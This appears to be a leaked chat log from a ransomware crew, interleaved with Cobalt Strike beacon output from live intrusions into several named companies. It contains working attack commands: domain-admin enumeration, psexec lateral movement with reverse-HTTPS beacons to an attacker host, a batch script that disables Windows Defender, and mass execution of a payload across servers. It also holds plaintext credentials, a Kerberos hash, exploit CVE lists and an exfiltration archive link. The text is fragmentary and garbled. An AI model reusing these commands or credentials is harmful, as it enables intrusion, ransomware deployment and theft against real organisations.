``Check carefully in the syslogin, where did we get this from? KLLOGIN=administrator KLPASSWD=Tabiam*987The script doesn't find the ball, no trusts, it writes to remote desktop usersThere seems to be no trusts
```

[*] 10/02 14:15:37 - Executing PowerView Get-DomainTrust via PowerPick
[*] Tasked beacon to run: Get-DomainTrust -Server 10.7.20.30 -Domain matches.com (unmanaged)
[+] host called home, sent: 133715 bytes
If they are not going to be dismounted, then let's go back to the original problem: I don't understand why they shouldn't be dismounted, but if they are, why should I ignore them?
OU=OLD Disabled Users,OU=Disabled Accounts
``Can't take anything down, just up-to-date information especially after news like this is always goodAfter this, the lists of DAs may have changed, as well as the lists of DCs, some of the network may have been closed```
CN=Service Accounts
``Then maybe the service ac-[ ](https://mediaeveryone.com/group/matches?msg=oG8izZZgEp6uYmy5h) DA was? Pull out the lists of pcs, users and in them by group find domain controller, domain adminI don't understand a bit why to do this on a dedicat``
beacon> shell net group "domain admins" /dom && net group "enterprise admins" /dom && net localgroup administrators
[*] Tasked beacon to run: net group "domain admins" /dom && net group "enterprise admins" /dom && net localgroup administrators
[+] host called home, sent: 132 bytes
[+] received output:
The request will be processed at a domain controller for domain WORKGROUP.

System error 1355 has occurred.

The specified domain either does not exist or could not be contacted.

``````

beacon> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 104518 bytes
[+] received output:
Domain Controllers:

[-] Error: 0

beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
``Yes, EA, DK listings reset-ping sees the host? Did I do something wrong again?
beacon> net view \\\HK-VPDC01 /all
[*] Tasked beacon to run net view on \\HK-VPDC01 /all
[+] host called home, sent: 104504 bytes
[+] received output:
List of hosts for domain '\\HK-VPDC01 /all':

 Server Name IP Address Platform Version Type Comment
 ----------- ---------- -------- ------- ---- -------
[-] Error: 87

beacon> net view \AWS-VDDC01 /all
[*] Tasked beacon to run net view on \AWS-VDDC01 /all
[+] host called home, sent: 104504 bytes
[+] received output:
List of hosts for domain '\AWS-VDDC01 /all':

 Server Name IP Address Platform Version Type Comment
 ----------- ---------- -------- ------- ---- -------
[-] Error: 87
``````
.PARAMETER Domain
        Domain to query for machines.
````Invoke-ShareFinder -HostList hosts.txt
function Invoke-ShareFinder {
    <#
        .SYNOPSIS
        Finds (non-standard) shares on machines in the domain.
        Author: @harmj0y
        
        .DESCRIPTION
        This function finds the local domain name for a host using Get-NetDomain,
        queries the domain for all active machines with Get-NetComputers, then for
        each server it lists of active shares with Get-NetShare. Non-standard shares
        can be filtered out with -Exclude* flags.
        .PARAMETER HostList
        List of hostnames/IPs to search.
        .PARAMETER ExcludeStandard.
        Exclude standard shares from display (C$, IPC$, print$ etc).
        .PARAMETER ExcludePrint
        Exclude the print$ share
        .PARAMETER ExcludeIPC
        Exclude the IPC$ share
        .PARAMETER CheckShareAccess
        Only display found shares that the local user has access to.
        .PARAMETER CheckAdmin
        Only display ADMIN$ shares the local user has access to.
        .PARAMETER Ping
        Ping each host to ensure it's up before enumerating.
        .PARAMETER NoPing
        Ping each host to ensure it's up before enumerating.
        .PARAMETER NoPing
        Don't ping each host to ensure it's up before enumerating.
        .PARAMETER Delay
        Delay between enumerating hosts, defaults to 0
        .PARAMETER Jitter
        Jitter for the host delay, defaults to +/- 0.3
        .PARAMETER Domain
        Domain to query for machines.
        .EXAMPLE
        > Invoke-ShareFinder
        Find shares on the domain.
        
        .EXAMPLE
        > Invoke-ShareFinder -ExcludeStandard
        Find non-standard shares on the domain.
        .EXAMPLE
        > Invoke-ShareFinder -Delay 60
        Find shares on the domain with a 60 second (+/- *.3)
        Randomized delay between touching each host.
        .EXAMPLE
        > Invoke-ShareFinder -HostList hosts.txt
        Find shares for machines in the specified hostlist.
        .LINK
        http://blog.harmj0y.net
Also, you can make life a lot easier for yourself.
net view \hostname /all
```
take ad_computers.txt and from there insert hostnames one by one into the command instead of hostnameda) ``)
beacon> psinject 7256 x64 Invoke-ShareFinder
[*] Tasked beacon to psinject: Invoke-ShareFinder into 7256 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or
ERROR: could not be contacted.
ERROR: "
ERROR: At line:849 char:9
ERROR: + $CompSearcher.FindAll() | ForEach-Object {
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : COMException
ERROR:
WARNING:
[!] No hosts found!

beacon> net view \\hostname /all
[*] Tasked beacon to run net view on \hostname /all
[+] host called home, sent: 104504 bytes
[+] received output:
List of hosts for domain '\\hostname /all':

 Server Name IP Address Platform Version Type Comment
 ----------- ---------- -------- ------- ---- -------
[-] Error: 87
Do not forget to re-create EA, DA lists all where there may be a password from the service DA or just from the DA, they have scripts ps1, cmd,bat, some credentials, password, account files, etc.Then do it now, if the script does not start, then manually (or via bATK) through the `net view \\\hostname /all` there are already a lot of things tried, I thought and did it, now on the search looked - was not - have you run it when the domain is visible?as a tool or output in this domain?
beacon> shell wmic /node:192.168.110.198 logicaldisk get caption /user:dom.helpathome.com\abunag /password:Start2020
[*] Tasked beacon to run: wmic /node:192.168.110.198 logicaldisk get caption /user:dom.helpathome.com\abunag /password:Start2020
[+] host called home, sent: 133 bytes
[+] received output:
Invalid GET switch.

``I'll finish up here quietly and dovroverify it, and then divide the tasks by server@tl1 all there.
you're not needed here anymore, go to helpathomeThe handle is invalid.
it's a protection against running under a system context by removing the token beforehand and specifying YES tokens when done - try without the "-s" parameter let it spin not even read the conf) seems to have gone with the file ... see what you're doing
try it with the cradle if you can't get the service under the token to try and bump the userhosts in the file and check that the error is flying at the moment of the domain inquiry
Reading from a File
Another way you can run commands on multiple computers at once is to use a text file. Using the syntax @<filename.txt>, PsExec will read every line in the text file as if it were a computer name. It will then process each computer individually.
``error tm1psek caught the bug = )How are you doing?
it's almost 3 hours already and psexec is already done, what's the difference, kill the services that can hold files and that's it? who knows how to tell if it's autorun service or not? and from token domain admin itself in system32 drop only psexec and file itself
psexec \\* -d -s -h start.exe -accepteula -y
``and run it like this@tl1 drop psexec utility on DC2 while the file works with the server systems already "touched"``they switched to Acronisvlom OK, I already found that NACs are inactive.there it is not there or turn all domain records in dnscmd I thought there is a full page dump from Everhirs Peak to the bottom of the Mariana Trench
   DNS Servers ... ... ... ... : 192.168.0.222
                                       127.0.0.1

I wonder if you can at least show them? @tl1 dump the DK dns records, maybe we'll find something else there....2not good for two reasons
1 - because I didn't tell you to take it off.
2 - because no one figured it out.

= )but the DNS records from the DNS server have not been removed? it is currently inactiveThis is not very relevant in part, but it is registered in the DNS with a busy name
Pinging nasstorage1.loomisco.com [192.168.0.231] with 32 bytes of data:Even if I saw it192.168.0.231 does anyone know this host?
dominant server
webservers and kilt pids that may occupy important processesstop services that are in autorun on momaunnyh machines so what? I have not changed it) the main thing then run under the same tokenDaSession made token in the SYSTEM what? systems rights with token? and under them to run the same file where the mounTeam
be sure to run the file with SYSTEM rights
Status Local Remote Network

-------------------------------------------------------------------------------
OK A:        \loomiswebsrv4\d$ Microsoft Windows Network
OK E:        \loomisgw2\d$ Microsoft Windows Network
OK Q:        \loomiswebsrv4\c$ Microsoft Windows Network
OK W:        \loomiswebsrv4\f$ Microsoft Windows Network
OK X:        \loomisgw2\c$ Microsoft Windows Network
OK Z:        \loomiswebsrv4\e$ Microsoft Windows Network

``There are all active logical disks of the 4 hosts where our file was deleted by an aver
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 170 bytes
[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
OK E:        \TLCAutoTFR.loomisco.com\c$
                                                Microsoft Windows Network
OK F:        \TLCEPICDB01.loomisco.com\c$
                                                Microsoft Windows Network
OK G:        \TLCEPICDB01.loomisco.com\e$
                                                Microsoft Windows Network
OK H:        \TLCEPICDB01.loomisco.com\f$
                                                Microsoft Windows Network
OK I:        \TLCSQLDB1.loomisco.com\c$
                                                Microsoft Windows Network
OK J:        \TLCSQLDB1.loomisco.com\e$
                                                Microsoft Windows Network
OK L:        \TLCSQLDB1.loomisco.com\f$
                                                Microsoft Windows Network
OK M:        \TLCEPICIIS1.loomisco.com\c$
                                                Microsoft Windows Network
The command completed successfully.


``We end up with something like this
beacon> shell wmic /node:loomiswebsrv4 logicaldisk get caption
[*] Tasked beacon to run: wmic /node:loomiswebsrv4 logicaldisk get caption
[+] host called home, sent: 79 bytes
[+] received output:
Caption

C:

D:

E:

F:

G:




beacon> shell wmic /node:loomisgw2 logicaldisk get caption
[*] Tasked beacon to run: wmic /node:loomisgw2 logicaldisk get caption
[+] host called home, sent: 75 bytes
[+] received output:
Caption

C:

D:

E:
``Anytime I try to upload a file''.
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
        0 file(s) copied.

``Errors like this``
beacon> jump psexec 10.10.10.5 pipe
[*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_9072) on 10.10.10.5 via Service Control Manager (\\10.10.10.5\ADMIN$\c316488.exe)
[+] host called home, sent: 287849 bytes
[-] could not upload file: 384
[-] Could not open service control manager on 10.10.10.5: 1722
[-] Could not connect to pipe: 384
beacon> jump psexec loomiswebsrv4 pipe
[*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_9072) on loomiswebsrv4 via Service Control Manager (\loomiswebsrv4\ADMIN$\7261303.exe)
[+] host called home, sent: 285742 bytes
[-] could not upload file: 384
[+] host called home, sent: 2122 bytes
[-] Could not open service control manager on loomiswebsrv4: 1722
[-] Could not connect to pipe: 384
To find out all logical drives on these hosts where the file does not start do the following

shell wmic logicaldisk get caption``
Application Server:
    TLCEPICAS01.loomisco.com +

Web DB:
    loomisgwdb2.loomisco.com +

File Server:
    TLCStorage1.loomisco.com +
    ScanStorage.loomisco.com +
    EobStorage.loomisco.com +
    Wyomissing_Ex1.loomisco.com +
    STORAGE.loomisco.com +

FAX Server:
    LOOMISFAXR02.loomisco.com +
    LOOMISFAXR01.loomisco.com -

Print Server:
    Printsrv16.loomisco.com +
    Printsrv08.loomisco.com +

Finance:
    FSITrack.loomisco.com +

Web Server:
    TLCWebP2.loomisco.com +
    loomiswebsrv4.loomisco.com -
    TLCWEBT1.loomisco.com +
    TLCWEBP1.loomisco.com +
    loomisgw2.loomisco.com -

Utility Server:
    TLCMONITORING.loomisco.com +
    TLCSophos.loomisco.com +

VMs:
    WebChat.loomisco.com +
    Metafile-vm1.loomisco.com +
    LOOMISGT2.loomisco.com +

HCL Sametime:
(HCL Sametime is a client-server application and middleware platform that provides real-time, unified communications and collaboration for enterprises. Those capabilities include presence information, enterprise instant messaging, web conferencing, community collaboration, and telephony capabilities and integration)
    LDSWYO21.loomisco.com +

Bitvise SSH Server; DHCP:
    TLCSKLM2.loomisco.com +

Applied Epic
(Applied Epic is the most technologically advanced cloud-based software application built for independent insurance agencies to automate business operations and drive connectivity to insurers and insureds in the changing insurance marketplace)
    EpicAPM.loomisco.com +
    TLCEPICCS01.loomisco.com +
``Well, I'm married there.
I need it for nowFAXR01 do not touchLOOMISFAXR01 on what? 1) I am on the current machine from where the session to run too? through the letter so we do the following
- leave all sessions on these servers open to make sure the processes occupied by the other files are dead before running the file (manually just kill them)
- Mount all logical drives of these 4 servers on one "own" serverDisassemble it makes no sense in fact, there may be two reasons for this
1) avera policies haven't been updated (since we haven't uninstall the agent itself, it keeps working on its own policies explicitly assigned to these hosts)
2) vindefi is a fierce windup, there are 4 hosts where the file is being pulled down because of some "special" settings avera only 2 out of 30 servers did not start via jump but started later via dll loading of stager and wmic at the moment manual work + the rest on their list go through everything is ready
You don't need to touch them.
I took these from your list and put them to work
Application Server:
    TLCEPICAS01.loomisco.com

Web DB:
    loomisgwdb2.loomisco.com +

File Server:
    TLCStorage1.loomisco.com +
    ScanStorage.loomisco.com +
    EobStorage.loomisco.com +
    Wyomissing_Ex1.loomisco.com +
    STORAGE.loomisco.com +
``Go to the bottom again + on pvsh you amsi works not psexec- don't open it```
Application Server:
    TLCEPICAS01.loomisco.com

Web DB:
    loomisgwdb2.loomisco.com

File Server:
    TLCStorage1.loomisco.com
    ScanStorage.loomisco.com
    EobStorage.loomisco.com +
    Wyomissing_Ex1.loomisco.com -
    STORAGE.loomisco.com -.

FAX Server:
    LOOMISFAXR02.loomisco.com -
    LOOMISFAXR01.loomisco.com -

Print Server:
    Printsrv16.loomisco.com -
    Printsrv08.loomisco.com +

Finance:
    FSITrack.loomisco.com

Web Server:
    TLCWebP2.loomisco.com -
    loomiswebsrv4.loomisco.com -
    TLCWEBT1.loomisco.com -
    TLCWEBP1.loomisco.com -
    loomisgw2.loomisco.com -

Utility Server:
    TLCMONITORING.loomisco.com +
    TLCSophos.loomisco.com

VMs:
    WebChat.loomisco.com +
    Metafile-vm1.loomisco.com -
    LOOMISGT2.loomisco.com +

HCL Sametime:
(HCL Sametime is a client-server application and middleware platform that provides real-time, unified communications and collaboration for enterprises. Those capabilities include presence information, enterprise instant messaging, web conferencing, community collaboration, and telephony capabilities and integration)
    LDSWYO21.loomisco.com -

Bitvise SSH Server; DHCP:
    TLCSKLM2.loomisco.com -

Applied Epic
(Applied Epic is the most technologically advanced cloud-based software application built for independent insurance agencies to automate business operations and drive connectivity to insurers and insureds in the changing insurance marketplace)
    EpicAPM.loomisco.com +
    TLCEPICCS01.loomisco.com -
``Yeah, bottoms up, you went from the bottom of the list, right? I'm taking these to work, okay?

```
Application Server:
    TLCEPICAS01.loomisco.com

Web DB:
    loomisgwdb2.loomisco.com

File Server:
    TLCStorage1.loomisco.com
    ScanStorage.loomisco.com
    EobStorage.loomisco.com
    Wyomissing_Ex1.loomisco.com
    STORAGE.loomisco.com
``consider that no one has heard it)`` I get it, my token is not setenen read)))))) there will always be a percentage of machines where you can not jump because either a ban on running the service is or hz
all jumps work through the service it then need to open the file and go on skip this, put a mark if you paid attention you can not open the service does not want to open
beacon> jump psexec_psh loomisgw2.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on loomisgw2.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 7825 bytes
[-] Could not open service control manager on loomisgw2.loomisco.com: 1722
[+] host called home, sent: 206472 bytes
[-] Could not connect to pipe (\loomisgw2.loomisco.com\pipe\status_9072): 384
beacon> jump psexec_psh TLCWEBT1.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCWEBT1.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 7824 bytes
[-] Could not open service control manager on TLCWEBT1.loomisco.com: 5
[+] host called home, sent: 206454 bytes
[-] Could not connect to pipe (\TLCWEBT1.loomisco.com\pipe\status_9072): 2
beacon> jump psexec_psh loomiswebsrv4.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on loomiswebsrv4.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 7829 bytes
[-] Could not open service control manager on loomiswebsrv4.loomisco.com: 1722
[+] host called home, sent: 206474 bytes
[-] Could not connect to pipe (\loomiswebsrv4.loomisco.com\pipe\status_9072): 384

``Did you do it without forcing the GPO policies require up to an hour and a half do it if not, you did not do it there was this item? did you do everything according to the instructions@tl1 did you force the gpoapdate? skip this for now, we can bypass it in a slightly different way at the end```
beacon> shell def.bat
[*] Tasked beacon to run: def.bat
[+] host called home, sent: 38 bytes
[+] received output:

C:\Windows\system32>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t reg_dword /d 0 /f
ERROR: Access is denied.


C:{Windows\system32>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:{Windows\ /t reg_dword /d 0 /f
ERROR: Access is denied.


C:{Windows\system32>reg add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f
ERROR: Access is denied.


C:{Windows\system32>reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
The operation completed successfully.


C:\Windows\system32>powershell.exe /c Add-MpPreference -ExclusionPath C:\ProgramData, C:\Windows
Add-MpPreference : The term 'Add-MpPreference' is not recognized as the name
of a cmdlet, function, script file, or operable program. Check the spelling of
the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:1
+ Add-MpPreference -ExclusionPath C:\ProgramData, C:\Windows
+ ~~~~~~~~~~~~~~~~
    + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
   mmandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
 

C:{Windows\system32>sc config WinDefend start= disabled
[SC] OpenService FAILED 5:

Access is denied.


C:\Windows\system32>sc stop WinDefend
[SC] OpenService FAILED 5:

Access is denied.


C:{Windows\system32>powershell.exe -exec Bypass /c Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference : The term 'Set-MpPreference' is not recognized as the name
of a cmdlet, function, script file, or operable program. Check the spelling of
the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:1
+ Set-MpPreference -DisableRealtimeMonitoring $true.
+ ~~~~~~~~~~~~~~~~
    + CategoryInfo : ObjectNotFound: (Set-MpPreference:String) [], Co
   mmandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

``And here's a protected registry hive, and this is a + - knocks out Defender``.
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t reg_dword /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\Windows\ /t reg_dword /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
powershell.exe /c Add-MpPreference -ExclusionPath C:\ProgramData, C:\Windows
sc config WinDefend start= disabled
sc stop WinDefend
powershell.exe -exec Bypass /c Set-MpPreference -DisableRealtimeMonitoring $true

Now the problems have started, which can only be "caught" by manual control.
TLCEPICIIS1 - the file is cut by an aver on startup, which one - vindef or sofos is not clear because both PIDs are present and for this in any case better to run manually ie, change the date on all files in the root of the disk the most important thing to check manually that the file works ud and there are many alternatives
batch
run it via psekzek
remote eczekUЪ because I left it on my list I don't see dk in the list))) you can do it in a hundred other ways - but here it is quite convenient and so because the network is small I load on each) I am not lazy) a few clicks do not touch the dk till the end.I top down this is your servers
bottom up move down the list or upload to each?
Application Server:
    TLCEPICAS01.loomisco.com

Web DB:
    loomisgwdb2.loomisco.com

File Server:
    TLCStorage1.loomisco.com
    ScanStorage.loomisco.com
    EobStorage.loomisco.com
    Wyomissing_Ex1.loomisco.com
    STORAGE.loomisco.com

FAX Server:
    LOOMISFAXR02.loomisco.com
    LOOMISFAXR01.loomisco.com

Print Server:
    Printsrv16.loomisco.com
    Printsrv08.loomisco.com

Finance:
    FSITrack.loomisco.com

Web Server:
    TLCWebP2.loomisco.com
    loomiswebsrv4.loomisco.com
    TLCWEBT1.loomisco.com
    TLCWEBP1.loomisco.com
    loomisgw2.loomisco.com

Utility Server:
    TLCMONITORING.loomisco.com.
    TLCSophos.loomisco.com

VMs:
    WebChat.loomisco.com
    Metafile-vm1.loomisco.com
    LOOMISGT2.loomisco.com

HCL Sametime:
(HCL Sametime is a client-server application and middleware platform that provides real-time, unified communications and collaboration for enterprises. Those capabilities include presence information, enterprise instant messaging, web conferencing, community collaboration, and telephony capabilities and integration)
    LDSWYO21.loomisco.com

Bitvise SSH Server; DHCP:
    TLCSKLM2.loomisco.com

Applied Epic
(Applied Epic is the most technologically advanced cloud-based software application built for independent insurance agencies to automate business operations and drive connectivity to insurers and insureds in the changing insurance marketplace)
    EpicAPM.loomisco.com
    TLCEPICCS01.loomisco.com
where is the executable where you can run it from where? I'm running the executable while I'm going through an open session in the list of servers so that's it, there's nothing interesting)) this should not stop you
3 is only 3 times more than 1
Navigate to Computer Configuration > Administrative Templates > Windows Components > Windows Defender
``there's no simple windows defenderThat's different from the guide because you have to disable it where there's no sofos agentTurn it off quietly Or touch it? I mean don't touch windef? lol) thank fuck dad for these 21st century black sessions5 sessions in less than a minute
beacon> jump psexec_psh TLCBENTS02.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCBENTS02.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 214286 bytes
[+] received output:
Started service 2c89d98 on TLCBENTS02.loomisco.com
beacon> jump psexec_psh TLCBENTS01.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCBENTS01.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 214293 bytes
[+] received output:
Started service 3a753bc on TLCBENTS01.loomisco.com
beacon> jump psexec_psh TLCRDSLIC1.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCRDSLIC1.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 214302 bytes
[+] received output:
Started service 5db0202 on TLCRDSLIC1.loomisco.com
beacon> jump psexec_psh TLCEPICTS02.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCEPICTS02.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 214296 bytes
[+] received output:
Started service 6e0d775 on TLCEPICTS02.loomisco.com
beacon> jump psexec_psh TLCEPICTS01.loomisco.com https
[*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCEPICTS01.loomisco.com via Service Control Manager (PSH)
[+] host called home, sent: 214300 bytes
[+] received output:
Started service cdbd232 on TLCEPICTS01.loomisco.com
``However, vindex didn't start on those servers where the agent is cut off, we just cut it off and now we're showing the focus.
since we haven't deleted the agent we're live showing.... I'm about
beacon > ssreenhoto disconnect vindef by GPOhttp://www.prajwaldesai.com/how-to-turn-off-windows-defender-using-group-policy/рдпты see the line at the bottom? it looks like the line of cobalt? you know where the start menu and so on)and see how the policies are applied respectively? this screenshot from cobalt or rd if it looks so now turn off sofos through the console by adding new policy and update agents
then we'll chop windefender via GPO policy right away, let's go, we'll get started - you help if you need to
while we started this one - get the helpathome + i tuta i don't see among the files ad_users the wrong place winfender log cleaned up, and i also tried through PS but nothing worked from scriptov to arma?[ ](https://mediaeveryone.com/group/oasispetroleum-com?msg=WjC8jA9pp3cGTSPik) vtotpishee here the last message that was done so far and what the problem) aazaley files by the way yesterday AD did not fill up here when picked up)) vindef and I like to think i already found there kakoy edr product?while put in suspended I will give a new accessthat I'm at a standstill, I can not raise the rights, I tried all sorts of pull in the cobu that it would spin, no luck, and as for eleveit kita none of this does not work (I do not knowkakzakriptovat) then the session in slipnetut trusts are there?+ready after the launch, write back + now I'll give you the buildd if the fix then yes[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=YCqw2iCZWFzgipPg7) what are you talking about? find a place on the server fix it very well here?
$krb5tgs$23$*sqladmin$ballymoregroup.local ballymore2015
``stupidly-a.
they didn't give away any of the downloaded options.
i would throw here if there were kerbs unbrushed for a week? + flew in 20 minutes @user4 will be clean not especially if you do not count that flew in 30+ sessions left then clean who coba cleaner? 1let me load Friday's sessions disappearedthere's not much useful information about accesses. i've downloaded a six gig backup here. have you looked up and down the iMicrosoft mail here?the root/pass combination does not seem to occur at all, and in the mail it was said that the nimbles are associated with the active directory, tried the DA and the IT guys, tried their passwords with the root, with the admin, does not pass
it was a year ago, if memory serves me right, so it's more likely they changed something there after the last command if there are any nix machines with root passwords or did you check them for nimbles also?eyJhbGciOiJBkayn7TmkXCguMUd8CObIEcS5WRGUcTYftsKX2cfNALYvYkbRWIqhaYyM6ooojDeBA+e3klCwlJa3RJl6WiSqIHFhnplRwl5rMsmYgzk+UoGOTvbI63qDU1UFDrpRca4Hbm25EcSuIyGeLk7pHTTt0FRStbPagIYan2DvveA+SDVqgzOoFyAvsJr5R11/xZjZq/kQPnpEAsUV5Eeh0lbipBZMdzKucGKsQazoCP9OreM=eyJhbGciOiJBXA+WtIovQPoqp2K84S6+4q1ckdN4vGVYhpmJJ+8+oT//XRSrMds0jtwTfCwKupkH4ql0OiOCQj1512fc5Z8qjozrhRoIYrXhhg8cwJcyx5tgHvkdLY7FXoj9+GzSKCfexKJF6svkVcokOOKamqI1Va4T3SAn97sLWCFmXHTIvwc9KKsIHpYKY+jB7PhNvtRlXGNKlvXNhJEkLLWsqMQh3mE02pyXvI+lGCn4XSH2MsQ=eyJhbGciOiJBHf2ySsK6xXP6KoeM1vNUNAbc9b3IP246Nfh90V7B1RpNH7mWbvZBLGGLPqbbcULjGK8PQCpLIXI7T9vFXd7tLogGtDaVCC1yUQIn8WiJMUsVZFfqzjqHIHq2DzVe3FEz8pIKT9ezit2RpyDBG18o7ERpyUh9BXZJWhkMsL5WnSieGN5PK40LWSjRuRjqkXDxeyJhbGciOiJBXVhfSr2Ku07cWgNsw0WXM86GF6aqGIghfab0mVEzAgKPjjEgaEzauzYda69jebKMr8Fmm6l032UjR+zk3IrGhqy1WALsjJm8v6fXuUe2vy/0Ugu/rACxPZtjSIKNYHBlQKaK8es1lbc4x2rUrhFXR1/4SyaJNGaEUJ3+/p/4mvo=eyJhbGciOiJBu0jyAiPOOUc36q2OJfdiywHf5l+EU+Zb4BqgcQkCW3bS3cXqpq/Zw6pvRquXkGuO5py4IP0CS2Ju+A+0Il9uzqfkF0aMcTapVMizNLCFqoODKULy16qpwDySTKGC0+uu - the ones that were already in the works +ElevateKitnetta)lpe is - Local Privilege Escalation ?Did you check the lpe?
    CVE-2015-2546
    CVE-2016-3309
    CVE-2017-0101
    CVE-2018-8120
    CVE-2019-1458
    CVE-2020-0796
```
trying to figure out the exploits, I think they'll fitzlalilsexploit, fill up the rubus and remove the kerbscrewsscale me when you pick it up I'll delete it
https://wideio.com/UWaHAGCE3ysxyInTF4bOqTShHpypftKMWQKJ0ZcK/ad.7z
``secmplease let me give it to you ado delete all files, tell me how you'll do it, put file 6 and archive it``
cmd /c 7za a ad.7z ad_computers.txt ad_group.txt ad_ous.txt ad_subnets.txt ad_users.txt
you know, now? where is 6:not enough files if you wrap a bunch then there is just a comma separated list without any quotes ?ok i'll pour you 7 tell me how you did upload you adfindshe now upload you there is unlikely to let no LA You do not have systems noticed there is a folder domain admin in the folder usernet, i upload or deadick upload tool and then run in this tool ?
and how do I pour the addfynd ?
C:\temp
OAPVDI17 @ OASISPETR\bmolinaro
 net localgroup "Administrators"
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
oasis_admin
OASISPETR\Domain Admins
OASISPETR\ryoung
OASISPETR\SCOM 2012 Administrators
The command completed successfully.

 00:00.0140

C:\temp
OAPVDI17 @ OASISPETR\bmolinaro
 net group "Domain Admins" /dom
The request will be processed at a domain controller for domain Oasispetr.com.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator buadmin camador_admin
dpeterson_admin jdehuma_admin jedmond_admin
ptran_admin ryoung_admin
The command completed successfully.

 00:00.0273

C:\temp
OAPVDI17 @ OASISPETR\bmolinaro
 net group "Enterprise Admins" /dom
The request will be processed at a domain controller for domain Oasispetr.com.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator buadmin camador_admin
dpeterson_admin jdehuma_admin jedmond_admin
ptran_admin ryoung_admin
The command completed successfully.
``````
user7:QnQnUKIIGIlqeZzisFpexTu92easVI7lyY8
user7:9rczctBY0p4wbKRPIsXqb8hcLY29VhrzDjH - valid?
https://wideio.com/iZsHDvbmvbXLZ8tAeyrT7HbWkZS6Ll40TXCUfJL0
``````
user7:9rczctBY0p4wbKRPIsXqb8hcLY29VhrzDjH
``Okay congratulations, I'll give you a new tule, while you work from it and wait for feedback that you did not pick up?`` Did not come? 100% must be because I was thrown out? +x64? apparently not registered as edrf only vindef....``



displayName=Windows Defender







``I'm not asking for the shellcode of your koba, give me the x64 shellcode, then don't say anything.
 net localgroup "administrators"
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
oasis_admin
OASISPETR\Domain Admins
OASISPETR\ryoung
OASISPETR\SCOM 2012 Administrators
The command completed successfully.
If your session is up, maybe I should just change the cobo?
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 Services 0 8 K Unknown NT AUTHORITY\SYSTEM 550:46:16 N/A
System 4 Services 0 144 K Unknown N/A 0:12:08 N/A
Registry 104 Services 0 99,096 K Unknown N/A 0:00:14 N/A
smss.exe 1108 Services 0 1,200 K Unknown N/A 0:00:00 N/A
csrss.exe 1216 Services 0 5,556 K Unknown N/A 0:00:17 N/A
wininit.exe 1324 Services 0 6,900 K Unknown N/A 0:00:00 N/A
services.exe 1448 Services 0 14,680 K Unknown N/A 1:25:07 N/A
lsass.exe 1464 Services 0 25,368 K Unknown N/A 0:02:36 N/A
svchost.exe 1616 Services 0 6,480 K Unknown N/A 0:00:01 N/A
svchost.exe 1664 Services 0 60,468 K Unknown N/A 0:01:21 N/A
fontdrvhost.exe 1704 Services 0 4,404 K Unknown N/A 0:00:00 N/A
svchost.exe 1844 Services 0 21,452 K Unknown N/A 0:05:14 N/A
svchost.exe 1888 Services 0 351,868 K Unknown N/A 0:00:12 N/A
svchost.exe 2040 Services 0 17,592 K Unknown N/A 0:00:08 N/A
